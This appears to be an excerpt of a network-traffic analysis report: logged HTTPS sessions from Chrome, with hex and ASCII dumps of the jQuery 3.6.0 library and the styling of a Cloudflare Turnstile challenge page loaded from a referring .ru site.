                                                                                                                  X-Cache-Hits: 2774, 1
                                                                                                                  X-Timer: S1734604975.998615,VS0,VE1
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                  2024-12-19 10:42:55 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.1649726104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:42:56 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://tt6l.xentore.ru/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:42:56 UTC1362INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:42:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 26678
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  origin-agent-cluster: ?1
                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  referrer-policy: same-origin
                                                                                                                  document-policy: js-profiling
                                                                                                                  2024-12-19 10:42:56 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 36 63 39 65 65 35 64 64 65 63 33 34 32 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8f46c9ee5ddec342-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:42:56 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                  2024-12-19 10:42:56 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
